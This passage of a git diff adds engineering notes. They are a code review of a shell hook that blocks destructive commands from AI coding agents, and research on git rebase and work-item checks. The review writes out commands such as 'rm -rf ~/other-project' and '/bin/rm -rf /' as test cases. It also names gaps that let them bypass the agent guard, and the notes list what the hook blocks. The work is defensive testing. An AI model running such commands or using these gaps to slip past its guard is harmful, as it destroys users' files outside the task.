+The two contradictory caps are collapsed into one derived value that cannot re-diverge, pinned by a test; the previously-silent budget drop now emits exactly one idempotent, correctly-namespaced operator signal with no spam lane and no candidacy loop. Fanout, manifest, and tests are all green. Ship it.

--- a/.lisa/quality-review-1960.md
+++ b/.lisa/quality-review-1960.md
@@ -1,0 +1,116 @@
+# Quality Review — safety-net-guard-parity (#1960)
+
+Reviewer: quality-specialist · Date: 2026-07-22
+Commits reviewed: `f02715fa7` (guard absorption), `eeb8f8faf` (upstream plugin retirement)
+Branch: `feat/1960-safety-net-guard-parity`
+
+## Verdict
+
+**Approve — no blocking findings.** One warning (a gap in a brand-new guard) and
+five suggestions. All claims in both commit messages verified empirically.
+
+## What was verified (all passed)
+
+| Check | Result |
+| --- | --- |
+| `bunx vitest run tests/unit/hooks/parity-safety-net-guards.test.ts` | **138/138 pass** (22.3s) |
+| Claimed 138-fixture count | Confirmed: 119 stateless + 8 git-state table rows + 11 individual tests = 138; no duplicate fixture IDs |
+| Claimed 73 block / 65 allow split | Confirmed exactly (68+5 block, 59+6 allow) |
+| Regression floor (`parity-safety-net.test.ts`, `parity-safety-net-heredoc.test.ts`, `install-claude-plugins-self.test.ts`) | **53/53 pass** |
+| Suite integrity (no skip/only/filter holes) | Clean — `it.each` iterates full exported arrays; no `.skip`/`.only`; every absorbed guard has paired block + near-miss-allow rows |
+| Temp-repo hygiene | Clean — `mkdtempSync` + `rmSync(recursive, force)` in `afterAll`; GIT_* stripped wholesale per repo learning; `GIT_CONFIG_GLOBAL/SYSTEM=/dev/null`; custom-rules leakage prevented by pointing `SAFETY_NET_RULES_FILE` at a nonexistent path |
+| Fan-out byte-consistency | Hook + heredoc parser byte-identical across `plugins/lisa{,-agy,-copilot,-cursor}` vs `plugins/src/base`; SKILL.md identical everywhere except `.codex-plugin`, whose truncated frontmatter description matches the established Codex build convention (body identical) |
+| Settings flips | All **10** templates set `"safety-net@cc-marketplace": false` |
+| Retirement mirror vs #1955 | Symmetrical: removed from curated install list, added to the same version-gated retirement loop; test pins all three directions (no install, uninstall on full sync, no uninstall on same-version skip) — exactly matching sentry's assertions |
+| Commit conventions | `feat`/`fix` types correct; `Co-Authored-By: Claude` present; `Work-Item:` trailer is the last line (repo requirement) |
+| SKILL.md guard list vs implementation | Items 1–14 map 1:1 onto hook guards (one wording gap, see S3) |
+| Comment accuracy: physical-path HOME gate (`pwd -P` both sides, macOS `/var` symlink) | Accurate, and genuinely exercised — the test temp dirs live under symlinked `/var/folders`, so canonicalization is what makes HM-B1/HM-A1 pass |
+| Comment accuracy: deliberately no `set -E` on the ERR trap | Reasonable and correctly reasoned — errtrace would propagate the exit-2 trap into the heredoc parser's command substitution, whose exit codes 10/20 are protocol |
+
+## Warning (should fix)
+
+### W1. New rm hardening misses tilde-spelled out-of-project paths
+
+- **What:** The new "rm target hardening" guard blocks deleting an absolute
+  path outside the project (`rm -rf /Users/someone/other-project` → blocked,
+  fixture RH-B4), but the *same directory spelled with a tilde* sails through:
+  `rm -rf ~/other-project` → **allowed** (verified empirically, exit 0).
+- **Why:** The token walk classifies targets by prefix: `-*` (flag), `.`/`..`,
+  `/*` (absolute), `*$*` (variable). A token starting with `~/` matches none
+  of those cases, so it falls through to "allowed". The shell expands `~/` to
+  the home directory at execution time, so this is exactly the
+  "outside-the-project" delete the guard exists to stop. The root-path guard
+  above it only catches bare `~`, `~/`, and `~/*` — not `~/name`.
+- **Where:** `plugins/src/base/hooks/parity-safety-net.sh:206-234` (the
+  `case "$token"` walk in guard 1b); same lines in all four fan-out copies.
+- **Fix:** Add a `'~'/*)` case arm (before the fall-through) that blocks like
+  the absolute-path arm — a tilde target is home-anchored, never
+  project-relative — plus a block/allow fixture pair (e.g. `rm -rf ~/Documents`
+  block; keep `rm -rf build` allow). Small, contained change.
+- **Blocking?** No. The safety net is defense-in-depth, documented as a
+  best-effort text scan; the ticket's named bypasses are all closed and this
+  spelling was not in the audit matrix. But it is an asymmetry inside a guard
+  this PR introduces, so it should be fixed in a follow-up (or in-PR if cheap).
+
+## Suggestions (nice to have)
+
+### S1. Guard 1's target scan is whole-command, causing a cross-statement false positive
+
+`rm -rf build && cd /` is **blocked** (verified, exit 2): the rm-flags check and
+the catastrophic-target check for guard 1 each run over the entire command, so
+the harmless `/` in the *second* statement is attributed to the `rm` in the
+first. Guard 1b already segments per-statement (`tr '&|;' '\n'`); guard 1 could
+reuse that machinery. `plugins/src/base/hooks/parity-safety-net.sh:164-168`.
+Overblocking only — never dangerous — and inside the documented text-scan FP
+class, so suggestion-level.
+
+### S2. Pre-existing: full-path rm invocations bypass every rm guard
+
+`/bin/rm -rf /` is **allowed** (verified): the `rm` boundary class
+`[^[:alnum:]_./-]` deliberately excludes `/`, so `/bin/rm` never reads as an rm
+invocation. This predates this PR (identical boundary in the pre-commit hook),
+so it is not a regression of this change — noted for a follow-up ticket, per
+the investigate-before-changing rule (the `/` exclusion likely prevents FPs on
+path arguments containing `…/rm…`). `parity-safety-net.sh:152-153`.
+
+### S3. Docs omit `prod` from the protected-branch list
+
+The force-push regex blocks `main|master|production|prod|release`
+(`parity-safety-net.sh:259`), but the hook header (line 15) and the SKILL.md
+guard list (item 3, `plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md:63`)
+say only "main/master/production/release". The regex predates this PR, but the
+SKILL.md guard list was written in it — one-word doc fix, docs currently
+understate coverage.
+
+### S4. Stale guard numbers in test comments
+
+The fixtures/tests reference the *pre-absorption* hook numbering:
+"M4. destructive SQL regressions (guard 4)"
+(`tests/helpers/safety-net-guard-fixtures.ts:228`) and "custom rules file
+(guard 5)" (`tests/unit/hooks/parity-safety-net-guards.test.ts:98`). In the
+shipped hook, SQL is guard 13 and custom rules guard 14. Guards 1–3 still
+coincide, which makes the stale ones look authoritative. Renumber or drop the
+parenthetical.
+
+### S5. Routing artifact status line still says `proposed`
+
+`parity/plugin-routing/safety-net@cc-marketplace.md:6` reads
+"**Status:** `proposed` (flip to `approved` …)" while the paired `.json` says
+`"status": "approved"`. Pre-existing mismatch, but the 2026-07-22 re-review
+edited the adjacent header lines and left it — worth fixing while touching the
+file.
+
+## Notes on things checked and found fine
+
+- Fail-closed behavior: malformed JSON → exit 2 (FC-B1); non-Bash tools and
+  empty commands exit 0 early, so fail-closed never over-triggers.
+- `read` loop over grep output is safe from the classic missing-final-newline
+  bug because grep terminates its output lines.
+- `set -f` around the token walk correctly prevents the hook expanding a
+  literal `*` against its own cwd, and every `block` path restores `set +f`
+  moot anyway since `block` exits.
+- Heredoc classifier still exempts gh-writer payloads and blocks executable
+  heredocs (HD-A1/HD-B1 smoke-pinned here; deep coverage stays in the
+  pre-existing suites, correctly cross-referenced).
+- `truncate -s 0 file.log` (coreutils) correctly allowed while SQL `TRUNCATE
+  sessions` blocks — the regex distinguishes them as intended.

--- a/.lisa/research-1956.md
+++ b/.lisa/research-1956.md
@@ -1,0 +1,105 @@
+# Research T1 — work-item-sync-lanes (CodySwannGT/lisa#1956)
+
+Researcher: T1 explorer · 2026-07-22 · branch `fix/1956-work-item-sync-lanes` (based on main @ 6a30a6a24, v2.292.0).
+Line numbers refer to `all/copy-overwrite/scripts/lisa-work-item.mjs` (1106 lines) unless stated.
+
+## 1. Validator anatomy (all/copy-overwrite/scripts/lisa-work-item.mjs)
+
+### 1a. assertStateBranch — L303–319
+
+- L304: `const branch = currentBranch()` → `currentBranch()` L75-77 = `git branch --show-current` (empty string when HEAD is detached — including mid-rebase).
+- L305-308: `if (!branch) throw "Cannot use a work-item binding from detached HEAD"` ← the #1956 throw.
+- L309-313: `state.branch === null` → "pending branch attachment; run … attach-branch".
+- L314-318: `state.branch !== branch` → "binding belongs to branch <state.branch>, not <branch>".
+- Compared state: `state.branch` from the worktree-private state file `.git/lisa/work-item.json` (statePath L71-73 uses `git rev-parse --git-path lisa/work-item.json`, so it is per-worktree) vs live `git branch --show-current`.
+
+Callers (all of them) and ordering vs trailer parsing:
+
+| Caller | Hook | When assertStateBranch runs |
+|---|---|---|
+| prepareCommitMessage L978-1003 | .husky/prepare-commit-msg (dispatch L1089) | L991 — BEFORE trailer insertion (interpret-trailers L994-1002). Early returns: merge source / release subject L984-988; no state → silent return L989-990. |
+| validateCommit L1005-1013 → validateMessage L837-847 | .husky/commit-msg | validateMessage order: merge-in-progress exemption L838-839 (MERGE_HEAD probe L372-378) → release subject L840-841 → trailer parse (exactWorkItem L843, parseTrailers L347-356 via git interpret-trailers) → assertStateMatches L844 → assertStateBranch L826. So the trailer is parsed FIRST but a detached-HEAD binding still throws — matches the issue ("adding the trailer does not help"). |
+| validatePush L1015-1030 → validateCommits L853-889 | .husky/pre-push | assertStateMatches at L880, after per-commit trailer parsing (L871) and live validation (L873). |
+| assertStateMatches L823-835 | shared | only runs when a state file exists (L825); assertStateBranch at L826. |
+| attach-branch (main L1070-1084) | CLI | does NOT call assertStateBranch; uses writeState(..., {requireBranch:true}) L1080 → throw L323-326 when detached. |
+
+Empirical (git 2.53.0, merge backend, verified in /tmp scratch): a CLEAN rebase pick runs prepare-commit-msg (from detached HEAD) but does NOT run commit-msg. So the R1 wedge is: .husky/prepare-commit-msg → `prepare-commit-msg` cmd → readState (binding present) → assertStateBranch throw → hook exit 1 → pick commit refused → rebase stops with the pick staged. validate-commit matters for `git rebase --continue` after a conflict and for manual commits — R1 repro should drive BOTH commands.
+
+Fix-1 shape: when `branch` is empty, probe `git rev-parse --git-path rebase-merge` and `--git-path rebase-apply` (worktree-safe, see §3), read `<dir>/head-name` (= `refs/heads/<branch>`), strip the prefix, validate against that. Keep the detached-HEAD throw when neither dir exists (fail closed).
+
+### 1b. parsePushLines L891-910 + validateCommits L853-889 + commitExemption L380-386
+
+- parsePushLines: pre-push stdin lines `<localref> <localOid> <remoteref> <remoteOid>`; destructured `[, localOid, , remoteOid]` L894; skips zero/empty localOid (ZERO_OID L21).
+  Range construction L896-899:
+  - remote ref exists: `git rev-list remoteOid..localOid` ← R2 bug: after `git merge origin/main` this range contains foreign main commits.
+  - new branch (remoteOid all zeros): `git rev-list localOid --not --remotes=<remote>` ← already excludes foreign commits (why push-as-new-branch works today).
+  - empty-stdin fallback L902-908: `git rev-list HEAD --not --remotes=<remote>`.
+- commitExemption L380-386: "merge" when `git rev-list --parents -n 1 <sha>` yields more than 2 fields (2+ parents); "release" when subject matches RELEASE_SUBJECT L19-20 (exact `chore(release): x.y.z [skip ci]`). Merge commits skipped in validateCommits L861-864 — but merged-in foreign NON-merge commits are not.
+- validateCommits: dedup shas L860, exemptions, exactly-one Work-Item trailer per remaining commit (exactWorkItem L871), mixed-refs rejection L875-878, live validation L873, assertStateMatches L880.
+
+Where the Fix-5 exclusion goes: the args construction at L896-899 (and the L902-908 fallback): append `"--not", "refs/remotes/<remote>/<default>"` to the `remoteOid..localOid` form. Security (T3): exclude ONLY the remote DEFAULT branch — never `--remotes=<remote>` in this lane, because that ref set includes the branch being (force-)updated, which would exempt everything the pusher controls.
+
+Offline-safe default-branch resolution (verified empirically):
+- `git symbolic-ref refs/remotes/origin/HEAD` → `refs/remotes/origin/main` in the lisa repo. It is a LOCAL symref — works offline.
+- When unset (fresh `git init` + `update-ref refs/remotes/origin/main` only — exactly the unit-test fixture shape): exit 128 "not a symbolic ref"; `git symbolic-ref -q` exits 1.
+- Fail-safe: when unset, SKIP the exclusion (current strict behavior; no weakening, no network). Never shell to `git remote show origin` (network) or gh here. Optional offline fallback: `git rev-parse -q --verify refs/remotes/<remote>/main` then `<remote>/master`.
+- Tests can set it: `git symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/main`.
+
+### 1c. Test harness — tests/unit/scripts/lisa-work-item.test.ts (731 lines)
+
+- Entrypoint: `SCRIPT = path.resolve("scripts/lisa-work-item.mjs")` (L27) — the 5-line shim; executed via `spawnSync(process.execPath, [SCRIPT, ...args], {cwd: fixture.root, env, input})` in `command()` L74-90 (returns {status, stdout, stderr}).
+- gh/acli/curl stubbing — FAKE-BIN pattern (createFixture L93-163): a `fake-bin/` dir inside the temp repo, PREPENDED to PATH (L110), holding `#!/bin/sh` scripts written by `executable()` L60-63. Fake gh (L116-136) switches on `"$1 $2"`: `issue view` → $FAKE_GH_ISSUE_JSON (with a hardcoded issue-43 OPEN payload used by the mixed-refs case), `api graphql` → $FAKE_GH_HIERARCHY_JSON, `pr view` → $FAKE_GH_PR_JSON (exit 1 when FAKE_GH_PR_MISSING=1), `repo view` → acme/code. Optional FAKE_GH_LOG appends argv for invocation-shape assertions. Per-test overrides are passed as `env: { FAKE_GH_ISSUE_JSON: … }` on `command()`.
+- Scratch repos: `mkdtempSync(tmpdir() + lisa-work-item-)`; env = `cleanGitEnv(process.env, {...IDENTITY, FAKE_*, GITHUB_REPOSITORY, LINEAR_API_KEY, PATH})` (strips hook-poisoned GIT_* — see project learning); GIT pinned to /usr/bin/git (L28); `git init -q -b main` → write+commit .lisa.config.json → `git switch -c feature/tracked`. Fixture roots pushed to `fixtures[]`, removed in afterEach.
+- Push-stdin convention (L377): `refs/heads/feature/tracked <head> refs/heads/feature/tracked <ZERO_OID>\n` piped as `input:`; remote-tracking refs faked with `git update-ref refs/remotes/origin/main <sha>` (L367-371).
+- Adding cases: plain `it(...)` in the three describes; write message files under fixture root; assert status 0/1 plus stdout `WORK_ITEM_TRACKING_OK …` or stderr substrings. R1: bind on feature branch, then create a REAL conflicted/mid-rebase state (two commits + conflicting main commit + `git rebase main`, hooks are not installed in fixtures so picks are only wedged when simulated — or `git checkout --detach` plus a hand-written `.git/rebase-merge/{head-name,onto}`; real rebase preferred). R2: commit with a closed-issue trailer on fixture main, merge into bound branch, push line with NON-zero remoteOid, and set the origin/HEAD symref.
+
+## 2. scripts/ vs all/copy-overwrite delta
+
+- `scripts/lisa-work-item.mjs` is a deliberate 5-line SHIM, not a stale copy: `await import("../all/copy-overwrite/scripts/lisa-work-item.mjs")`. Both files were created in the same commit d557349e1 ("feat: require tracked work before durable changes") and the shim never diverged. The relative import resolves against the shim file location, so it always executes the repo copy-overwrite implementation regardless of cwd.
+- The unit test executes the shim → therefore the copy-overwrite implementation.
+- Lisa repo hooks: .husky/{prepare-commit-msg,commit-msg,pre-push} resolve `WORK_ITEM_SCRIPT="scripts/lisa-work-item.mjs"` and fall back to `all/copy-overwrite/scripts/lisa-work-item.mjs` only if the first is missing. In this repo the shim exists → hooks run shim → copy-overwrite impl. Downstream projects receive the FULL file at scripts/lisa-work-item.mjs via apply (copy-overwrite semantics). Rails wires the same commands through rails/copy-overwrite/lefthook.yml.
+- Pinned by tests/unit/hooks/work-item-wiring.test.ts: L31-33 requires the shim to contain the `../all/copy-overwrite/...` import; L34-49 requires all 8 subcommand dispatches in the copy-overwrite file; also pins .husky and typescript/copy-contents/.husky hook text.
+- Sanctioned reconciliation (one PR): edit ONLY all/copy-overwrite/scripts/lisa-work-item.mjs (single source of truth); leave the shim untouched. `all/` is an upstream-evidence-manifest root (scripts/generate-upstream-evidence-manifest.mjs L14-15 lists `plugins/src/` and `all/`), so run `bun run build:upstream-evidence-manifest` IN THE SAME COMMIT or CI fails "manifest is stale".
+
+## 3. Rebase state surfaces (verified empirically, git 2.53.0, /tmp scratch repos)
+
+Merge backend (default), conflicted stop — `.git/rebase-merge/` contains: author-script, done, drop_redundant_commits, end, git-rebase-todo, git-rebase-todo.backup, head-name, interactive, message, msgnum, no-reschedule-failed-exec, onto, orig-head, patch, stopped-sha. Top-level `.git/`: AUTO_MERGE, MERGE_MSG, ORIG_HEAD, REBASE_HEAD. head-name = `refs/heads/feature`; onto = sha. `git branch --show-current` = "" (detached). Porcelain `UU f.txt`; `git ls-files -u` = 3 entries.
+
+Clean-pick wedge (prepare-commit-msg exits 1 — the exact #1956 wedge, reproduced): `.git/rebase-merge/` exists but WITHOUT stopped-sha, patch, message. `ls-files -u` = 0; porcelain shows the pick staged (`A  b.txt`); AUTO_MERGE and REBASE_HEAD exist.
+
+Worktree rebase: state lives at `.git/worktrees/<name>/rebase-merge/` (NOT the main .git/); `git rev-parse --git-path rebase-merge` resolves it correctly from inside the worktree. Same file set; head-name = the worktree branch; AUTO_MERGE is a per-worktree ref and resolves there. Always resolve via `git rev-parse --git-path`, never a hardcoded `.git/` path.
+
+Apply backend (`git rebase --apply`): `.git/rebase-apply/` with 0001, 0002, abort-safety, apply-opt, author-script, final-commit, head-name, keep, last, messageid, next, onto, …; conflicts appear as unmerged index entries. (AUTO_MERGE was observed present mid-apply-rebase in a repo with earlier merge-backend activity — do NOT infer the backend from AUTO_MERGE; use the dirs.)
+
+"Conflict resolutions exist" discriminator (verified) — diff worktree/index against the AUTO_MERGE ref (the merge-ort recorded conflicted tree):
+
+| State | git ls-files -u | git diff --quiet AUTO_MERGE | git diff --cached --quiet AUTO_MERGE |
+|---|---|---|---|
+| conflict stop, untouched | 3 (UU) | rc 0 (worktree == merge-ort output) | n/a |
+| resolved, unstaged | 3 | rc 1 | — |
+| resolved + git add | 0 | rc 1 | rc 1 |
+| clean-pick wedge | 0 | rc 0 | rc 0 |
+
+⇒ abort-safe ⇔ rebase-merge exists AND both diffs vs AUTO_MERGE are quiet (nothing beyond the mechanical state git itself wrote → aborting loses no human/agent work). Non-quiet → resolutions exist → block. Fail closed when: rebase-apply backend, AUTO_MERGE unresolvable, or any probe errors (T3 requirement). Notes: `git rebase --abort` deletes AUTO_MERGE (verified); porcelain alone CANNOT distinguish clean-wedge from resolved-staged (both show staged changes with u=0) — the AUTO_MERGE diff is the discriminating signal.
+
+## 4. Safety-net --abort guard — there is currently NO such guard in the Lisa hook
+
+- plugins/src/base/hooks/parity-safety-net.sh (431 lines) contains NO rebase/merge --abort rule — the Lisa parity hook ALLOWS `git rebase --abort` unconditionally today. Guard map: rm family L180-275, force-push L277-300, reset-dirty L302-313 (the model for a git-state-aware guard: it runs `git status --porcelain` at hook time in the hook cwd), checkout L315-326, switch L328-331, restore L333-342, stash L344-348, clean L350-357, branch force-delete L359-368, tag/reflog/worktree L370-382, find/xargs L384-396, disk L398-410, SQL L412-416, custom rules L418-429. A new abort guard slots naturally after guard 3.
+- The block observed in the field comes from the UPSTREAM safety-net@cc-marketplace plugin: REASON_REBASE_ABORT = "git rebase --abort discards rebase conflict resolutions. Use git status first." (cache ~/.claude/plugins/cache/cc-marketplace/safety-net/1b6d3f454003/dist/index.js:2569 and :2825) — unconditional. The lisa repo itself disables that plugin (.claude/settings.json:23 `"safety-net@cc-marketplace": false`) in favor of the lisa@lisa parity hook (registered at plugins/lisa/.claude-plugin/plugin.json:104 → ${CLAUDE_PLUGIN_ROOT}/hooks/parity-safety-net.sh).
+- The #1960 guard audit DELIBERATELY skipped absorbing the abort blocks: .lisa/research-1960-guard-audit.md:60-61 rows 15/16 ("blocking it strands agents mid-rebase"). Fix 4 therefore ADDS a conditional guard (block only when the §3 discriminator says resolutions exist), formalizing the allow and closing the lossy case. Red-first framing for R3: the currently-failing fixture is the BLOCK-with-resolutions row; the ALLOW-clean row passes today.
+- Fixture rows: none exist for abort yet. Conventions: tests/helpers/safety-net-guard-fixtures.ts — STATELESS_FIXTURES via fx(id, command, verdict, guard) and GIT_STATE_FIXTURES via gfx(id, repo, command, verdict) (currently only clean/dirty repos, rows GS-B1…GS-A6 at L305-317). Driver: tests/unit/hooks/parity-safety-net-guards.test.ts (it.each over fixtures; real hook via tests/helpers/safety-net-guard-harness.ts — HOOK_PATH = plugins/lisa/hooks/parity-safety-net.sh, bash subprocess, PreToolUse JSON on stdin, exit 2 = block / 0 = allow; makeRepo(root, name, dirty) builds repos with GIT_* stripped and GIT_CONFIG_GLOBAL=/dev/null). R3 needs the harness extended with rebase-state repo builders (clean-wedge repo and resolved-conflict repo, built with a real conflicted rebase per §3 recipes) plus a new repo kind in GitStateFixture or a dedicated describe.
+- Fanout: plugins/src/base/hooks/parity-safety-net.sh is the SOURCE; `bun run build:plugins` (scripts/build-plugins.sh) fans byte-identical copies to plugins/{lisa,lisa-cursor,lisa-agy,lisa-copilot}/hooks/ (verified identical today); `check:plugins` (scripts/check-plugins-sync.sh) gates drift; plugins/src/ is also a manifest root (§2). There is a parity-safety-net.agy.sh variant — check whether the new guard needs the same edit there (Antigravity parity rule).
+
+## 5. Recently merged on these paths (collision check)
+
+origin/main (today, all already IN v2.292.0 = 6a30a6a24, which this branch is based on — no rebase needed):
+- b8bde38b3 / PR #1976 feat/1960-safety-net-guard-parity — commits 29818e25f (rm split gate), 8ab54c7e6 (git global-option + path-prefixed rm bypasses), f02715fa7 (absorb upstream 1.0.6 guards). All touch parity-safety-net.sh + safety-net-guard-fixtures.ts + guards tests. Fix 4 lands on top of these.
+- cc87d0d36 test(security) — touched tests/unit/scripts/lisa-work-item.test.ts.
+- Last changes to all/copy-overwrite/scripts/lisa-work-item.mjs: 8df8de3b1, d557349e1. Shim: d557349e1 only. No in-flight branches found touching these files.
+- Provenance: ledger entry learner-c6b0e3b7de71 carries the upstream-candidate marker for this issue.
+
+## 6. Extra targets the plan needs
+
+- Fix 3-rewritten skill text: plugins/src/base/skills/lisa-implement/SKILL.md:97-98 ("Rebase the feature branch onto `origin/<base>` … BEFORE starting work") — update to document both sync lanes; regenerate fanout via build:plugins (copies under plugins/lisa*/skills and .codex-plugin).
+- Hazard for T2 workflow: THIS session runs the lisa parity hook (upstream safety-net disabled), which does not block `git rebase --abort` — scratch-repo abort experiments are safe. But the hook DOES fail-closed on unknown heredocs: write test fixtures with the Write/Edit tools or node/printf, not `cat` heredocs.
+- Scratch probes left under /tmp/lisa-1956-rebase-probe/ (repo, repo2-5, wt5) — disposable.

--- a/.lisa/research-1957.md
+++ b/.lisa/research-1957.md
@@ -1,0 +1,69 @@
+# Research — #1957 Linear bare repo-name label (T1)
+
+Source file: `all/copy-overwrite/scripts/lisa-work-item.mjs` (the installed copy; root `scripts/lisa-work-item.mjs` is a 5-line re-import shim — `scripts/lisa-work-item.mjs:1-5` — never edit it).
+Test file: `tests/unit/scripts/lisa-work-item.test.ts`.
+
+## 1. assertRepoScope semantics
+
+Definition — `all/copy-overwrite/scripts/lisa-work-item.mjs:428-439`:
+
+```js
+function assertRepoScope(ref, contract, labels, components = []) {
+  const expected = `repo:${contract.identityRepo}`.toLowerCase();
+  const labelNames = namesFrom(labels);
+  const componentNames = namesFrom(components);
+  if (
+    !labelNames.includes(expected) &&
+    !componentNames.includes(contract.identityRepo.toLowerCase())
+  ) {
+    throw new TrackingError(
+      `Work item ${ref} is not scoped to repository ${contract.identityRepo}; require label ${expected}`
+    );
+  }
+}
+```
+
+- **Signature:** `(ref, contract, labels, components = [])`. Accept iff label list contains exactly `repo:<identityRepo>` (lowercased) OR component list contains bare `<identityRepo>` (lowercased). The bare name is ALREADY accepted — but only via `components`, which only Jira supplies.
+- **Repo-scope NAME derivation:** `contract.identityRepo` = `currentRepoIdentity(config)` (`lisa-work-item.mjs:205-218`): `config.repo ?? config.github.repo` → `GITHUB_REPOSITORY` env → `git remote get-url origin`; each candidate goes through `repoBasename` (`:198-203`): `trim()`, strip trailing `.git`, `split(/[/:]/)`, take last segment → the repo **short name** (e.g. `frontend`, never `owner/frontend`). The label suffix must equal that short name. NOT parsed from `contract.repository` (that is the GitHub queue repo only).
+- **Normalization:** `namesFrom` (`:420-426`) accepts strings or `{name}` objects, drops non-strings, lowercases each. **No trim on label names** (identityRepo is trimmed upstream by `repoBasename`). Match is exact-string after lowercase — no substring/prefix acceptance (the T3 security requirement already holds today; preserve it in the bare arm).
+- **repositoryIsIdentity:** GitHub-contract-only field (`trackerContract`, `:236-239`): true when the queue repository equals `org/github.repo` case-insensitively. Sole consumer: `githubIssue` at `:542-544` — `if (!contract.repositoryIsIdentity) assertRepoScope(...)` — i.e. the scope check is **skipped entirely** when binding from the identity repo itself; it only runs with a distinct `github.queueRepo`. Jira/Linear contracts (`:241-268`) have no such field — they always check.
+- **Exact rejection template:** `Work item ${ref} is not scoped to repository ${contract.identityRepo}; require label ${expected}` (`:437`).
+- **Tests pinning the message** (all pin only the prefix via `toContain`; NONE pin the `require label ...` tail):
+  - `tests/unit/scripts/lisa-work-item.test.ts:423` — GitHub lane: "not scoped to repository identity"
+  - `tests/unit/scripts/lisa-work-item.test.ts:672` — Jira acli lane: "not scoped to repository widgets"
+  - `tests/unit/scripts/lisa-work-item.test.ts:811` — Linear lane: "not scoped to repository widgets"
+  - Repo-wide grep for "require label" / "is not scoped to repository" outside the source hits nothing else (only `.lisa/plan-1957.md`). No docs-guard pins this wording → the message tail can safely be rewritten to name both accepted forms, provided the `not scoped to repository <name>` prefix survives.
+
+## 2. Vendor paths — one shared call site per vendor, single function
+
+- **Linear:** `linearIssue` (`:697-770`) fetches GraphQL `labels{nodes{name}}` and calls `assertRepoScope(ref, contract, issue.labels?.nodes)` at `:759` — **labels only, no 4th arg** → `components` defaults `[]`, so the bare-name component alias is unreachable on Linear. That is the bug: Linear has no component field, and Sentry-origin issues carry bare `frontend`.
+- **GitHub:** `githubIssue` calls `assertRepoScope(ref, contract, issue.labels)` at `:543` — also labels-only, guarded by `repositoryIsIdentity`.
+- **Jira:** both credential paths pass labels AND components (`:614-619` curl, `:672-677` acli) — bare name already accepted there via the component alias.
+- All vendors call the **same single function**; there is no vendor fork. An Option-A edit inside `assertRepoScope` (accept bare `<identityRepo>` in `labelNames` too) is **naturally uniform** across GitHub/Jira/Linear.
+- **Recommendation: uniform** — the intake convention is documented as "uniform across trackers (JIRA / GitHub / Linear)" (`plugins/lisa/rules/reference/config-resolution.md:949`), and Jira already accepts the bare name via components, so a uniform bare-label arm symmetrizes an existing acceptance instead of forking per vendor. (GitHub identity-repo binds skip the check anyway; only split queue-repo setups even reach it.)
+
+## 3. Intake-side rule the fix mirrors
+
+- **In-repo canonical convention** — `plugins/lisa/rules/reference/config-resolution.md:949`: "A work item target repo is recorded as a **label** `repo:<name>`, where `<name>` is the repo short name (e.g. `repo:frontend`). The convention is uniform across trackers (JIRA / GitHub / Linear) ... On JIRA a **component** equal to the repo name is accepted as an alias". And `:973`: "The match is by repo short name (`repo:<CURRENT_REPO>`), case-insensitive." (Mirrored at `plugins/lisa-cursor/rules/config-resolution-reference.mdc:954,973` and copilot/base variants.)
+- **The "match both" rule** the issue cites is NOT yet in Lisa repo docs — it lives in TunnlAI project memory: `~/.claude/projects/-Users-cody-workspace-tunnlai-projects-frontend/memory/linear-repo-label-taxonomy.md`: "`repo:frontend` / `repo:backend` / `repo:infrastructure` — the Lisa repo-binding trio. Every *planned* work item uses these. bare `frontend` / `backend` — Sentry-origin labels, applied only to crash issues backfilled from Sentry. ... How to apply: When scoping intake or queries to a repo, filter on `repo:frontend OR frontend`". Sibling memory `...-tunnlai-projects-tunnl-backend/memory/tun-backend-intake-label-gap.md:16` documents the same two-family taxonomy.
+- Issue #1957 body states it directly: "mirroring the intake-side rule that repo-scoped queries must match both `repo:<name>` and bare `<name>`" and "bare labels mark Sentry provenance; `repo:*` marks planned work".
+- **Cite in the fix:** issue #1957 + `config-resolution.md:949/:973` (uniform across trackers, exact short name, case-insensitive). No in-repo doc forbids bare acceptance on the read side; `plugins/lisa/scripts/queue-status-build-readers.mjs:112-127` filters on the `repo:` family for queue counting only — out of scope here.
+
+## 4. Test conventions for the Linear lane + where R1 lives
+
+- Harness: `createFixture()` (`tests/unit/scripts/lisa-work-item.test.ts:92+`) builds a temp git repo with a `fake-bin/` on PATH holding shell shims for `gh`, `acli`, `curl`. The Linear lane runs through the **fake `curl`**, which echoes env var `FAKE_CURL_JSON`; `LINEAR_API_KEY: "fake-linear-key"` is preset at `:109`. Default `FAKE_CURL_JSON` (`:103`) is a LIN-12 GraphQL payload labeled `repo:widgets` / `status:in-progress` / `type:Task`.
+- Linear contract stub pattern: `createFixture({ tracker: "linear", repo: "widgets", linear: { workspace: "acme", teamKey: "LIN" } })` then `command(fixture, ["bind", "LIN-12"], { env: { FAKE_CURL_JSON: ... } })`.
+- The Linear negative-path test is `it("rejects wrong-repo, unclaimed, and container Linear issues")` at `:779` inside `describe("provider liveness")` (`:619`), with a local `response(labels, children)` JSON helper at `:785-800`.
+- **R1 location:** `describe("provider liveness")`, adjacent to `:779` — e.g. `it("accepts a bare repo-name label on the Linear lane (#1957 R1)")` using `response(["widgets", "status:in-progress", "type:Task"])` → expect status 0. Controls that must stay red: no scope label at all; bare wrong repo `response(["backend", ...])`; `repo:other` (already covered at `:803-812`) → status 1 + "not scoped to repository widgets".
+- GitHub parity pin (if uniform adopted): extend the queue-repo test near `:386-423` (fixture `github: { org: "acme", repo: "identity", queueRepo: "acme/widgets" }`, `FAKE_GH_ISSUE_JSON`) with a bare `identity` label acceptance case.
+
+## 5. Recent history — no collision
+
+`git log` for the file shows only 3 commits: `bdedff6e4` (#1956 sync lanes), `8df8de3b1`, `d557349e1` (introduced the script). `git log -L 428,440` shows `assertRepoScope` written once in `d557349e1` and never modified since; the `bdedff6e4` diff contains **0** occurrences of `assertRepoScope` (it touched `parsePushLines` / `assertStateBranch` / rebase-merge lanes only). `0e0b56561` adjusted branch-sync prose/test pins only. The region is collision-free, and the file was last touched on this very branch.
+
+## Implementation notes for T2
+
+- Edit source only: `all/copy-overwrite/scripts/lisa-work-item.mjs:428-439` — add `labelNames.includes(contract.identityRepo.toLowerCase())` as a third acceptance arm; update the message to name both forms while keeping the `is not scoped to repository <name>` prefix (all three test pins use `toContain` on that prefix).
+- Mutation-proof: the `repo:other` control (`:811`) plus a new bare-`backend` control kill an accept-any-label mutant.
+- Same-commit requirement: `bun run build:upstream-evidence-manifest` (template/source edit → stale-manifest CI gate).
+- Full `bun run test` before commit (#1956 lesson).

--- a/.lisa/research-1958.md
+++ b/.lisa/research-1958.md
@@ -1,0 +1,214 @@
